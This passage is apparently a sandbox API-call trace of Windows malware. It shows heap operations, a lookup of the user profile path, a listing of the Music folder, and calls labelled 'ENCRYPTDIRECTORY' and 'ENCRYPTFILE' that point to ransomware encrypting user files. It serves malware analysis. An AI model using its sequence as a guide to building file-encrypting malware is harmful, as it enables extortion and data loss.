ftLastWriteTime.dwLowDateTime=0x43ea958, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="", cAlternateFileName="ﹸмńဓ+\x10")) returned 0 [0109.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0109.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0109.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0109.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0109.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0109.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0109.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0109.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0109.428] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0109.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0109.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0109.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0109.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0109.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0109.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0109.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0109.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0109.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0109.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0109.429] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0109.429] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0109.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0109.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0109.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0109.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0109.429] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0109.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0109.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0109.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0109.432] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0109.432] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x144f3f8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0109.432] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0109.432] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0109.432] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\*", lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe83af700, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe83af700, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9d88, cFileName=".", cAlternateFileName="")) returned 0x41ac140 [0109.432] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe83af700, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe83af700, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43c9d88, cFileName="..", cAlternateFileName="")) returned 1 [0109.432] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144eca8 | out: lpFindFileData=0x144eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d900a30, ftCreationTime.dwHighDateTime=0x1d5e918, ftLastAccessTime.dwLowDateTime=0x2cc0f370, ftLastAccessTime.dwHighDateTime=0x1d5eac4, ftLastWriteTime.dwLowDateTime=0x2cc0f370, ftLastWriteTime.dwHighDateTime=0x1d5eac4, nFileSizeHigh=0x0, nFileSizeLow=0x6fb6, dwReserved0=0x0, dwReserved1=0x43c9d88, cFileName="2 MaJ1.m4a", cAlternateFileName="2MAJ1~1.M4A")) returned 1 [0109.432] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f32a4e0, ftCreationTime.dwHighDateTime=0x1d5e288, ftLastAccessTime.dwLowDateTime=0x53cc5140, ftLastAccessTime.dwHighDateTime=0x1d5ef32, ftLastWriteTime.dwLowDateTime=0x53cc5140, ftLastWriteTime.dwHighDateTime=0x1d5ef32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="9sMMb260B1u", cAlternateFileName="9SMMB2~1")) returned 1 [0109.432] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0109.433] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cde5630, ftCreationTime.dwHighDateTime=0x1d5e3fd, ftLastAccessTime.dwLowDateTime=0xe537d520, ftLastAccessTime.dwHighDateTime=0x1d5e3cd, ftLastWriteTime.dwLowDateTime=0xe537d520, ftLastWriteTime.dwHighDateTime=0x1d5e3cd, nFileSizeHigh=0x0, nFileSizeLow=0xe295, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="fR5QK.wav", cAlternateFileName="")) returned 1 [0109.433] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd40a7170, ftCreationTime.dwHighDateTime=0x1d5e703, ftLastAccessTime.dwLowDateTime=0x84cc6ba0, ftLastAccessTime.dwHighDateTime=0x1d5edc4, ftLastWriteTime.dwLowDateTime=0x84cc6ba0, ftLastWriteTime.dwHighDateTime=0x1d5edc4, nFileSizeHigh=0x0, nFileSizeLow=0x12fb3, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="gXtG5sqySgJuIPIsH.mp3", cAlternateFileName="GXTG5S~1.MP3")) returned 1 [0109.433] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x935f67b0, ftCreationTime.dwHighDateTime=0x1d5e9c5, ftLastAccessTime.dwLowDateTime=0xf1ec05f0, ftLastAccessTime.dwHighDateTime=0x1d5ed3e, ftLastWriteTime.dwLowDateTime=0xf1ec05f0, ftLastWriteTime.dwHighDateTime=0x1d5ed3e, nFileSizeHigh=0x0, nFileSizeLow=0x12e0b, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="Juj1PsS7vx.m4a", cAlternateFileName="JUJ1PS~1.M4A")) returned 1 [0109.433] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6af1030, ftCreationTime.dwHighDateTime=0x1d5e5e7, ftLastAccessTime.dwLowDateTime=0xe23eca30, ftLastAccessTime.dwHighDateTime=0x1d5e55e, ftLastWriteTime.dwLowDateTime=0xe23eca30, ftLastWriteTime.dwHighDateTime=0x1d5e55e, nFileSizeHigh=0x0, nFileSizeLow=0x10c18, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="MZTSENpJHOvP.mp3", cAlternateFileName="MZTSEN~1.MP3")) returned 1 [0109.433] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4634ef0, ftCreationTime.dwHighDateTime=0x1d5f0bd, ftLastAccessTime.dwLowDateTime=0xd6622ec0, ftLastAccessTime.dwHighDateTime=0x1d5e7a0, ftLastWriteTime.dwLowDateTime=0xd6622ec0, ftLastWriteTime.dwHighDateTime=0x1d5e7a0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="RjvHKIDt9", cAlternateFileName="RJVHKI~1")) returned 1 [0109.433] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d1a2630, ftCreationTime.dwHighDateTime=0x1d5eeb1, ftLastAccessTime.dwLowDateTime=0x13182270, ftLastAccessTime.dwHighDateTime=0x1d5ee54, ftLastWriteTime.dwLowDateTime=0x13182270, ftLastWriteTime.dwHighDateTime=0x1d5ee54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="spIObPh75b", cAlternateFileName="SPIOBP~1")) returned 1 [0109.433] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c872b50, ftCreationTime.dwHighDateTime=0x1d5e3f8, ftLastAccessTime.dwLowDateTime=0xd4b41fc0, ftLastAccessTime.dwHighDateTime=0x1d5e944, ftLastWriteTime.dwLowDateTime=0xd4b41fc0, ftLastWriteTime.dwHighDateTime=0x1d5e944, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="tG2O", cAlternateFileName="")) returned 1 [0109.433] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4bcbc30, ftCreationTime.dwHighDateTime=0x1d5e3f6, ftLastAccessTime.dwLowDateTime=0x7503b690, ftLastAccessTime.dwHighDateTime=0x1d5e1dc, ftLastWriteTime.dwLowDateTime=0x7503b690, ftLastWriteTime.dwHighDateTime=0x1d5e1dc, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="xJgB9.wav", cAlternateFileName="")) returned 1 [0109.483] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e21c0, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x16, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3564, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="﫠мńဓ+\x10")) returned 0 [0109.483] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0109.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|2 MaJ1.m4a|desktop.ini|fR5QK.wav|gXtG5sqySgJuIPIsH.mp3|Juj1PsS7vx.m4a|MZTSENpJHOvP.mp3|xJgB9.wav", cchCount1=97, lpString2="", cchCount2=0) returned 3 [0109.483] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0109.483] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\2 MaJ1.m4a", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d900a30, ftCreationTime.dwHighDateTime=0x1d5e918, ftLastAccessTime.dwLowDateTime=0x2cc0f370, ftLastAccessTime.dwHighDateTime=0x1d5eac4, ftLastWriteTime.dwLowDateTime=0x2cc0f370, ftLastWriteTime.dwHighDateTime=0x1d5eac4, nFileSizeHigh=0x0, nFileSizeLow=0x6fb6, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="2 MaJ1.m4a", cAlternateFileName="2MAJ1~1.M4A")) returned 0x41ac100 [0109.484] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0109.484] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0109.484] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0109.484] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0109.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0109.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca1a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0109.484] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\2 MaJ1.m4a" (normalized: "c:\\users\\fd1hvy\\music\\2 maj1.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0109.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0109.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0109.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0109.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0109.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0109.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0109.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0109.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0109.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0109.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0109.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0109.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0109.485] FreeLibrary (hLibModule=0x772d0000) returned 1 [0109.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0109.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0109.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0109.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0109.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0109.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0109.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0109.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0109.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0109.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0109.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0109.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0109.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0109.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0109.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0109.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0109.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0109.487] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 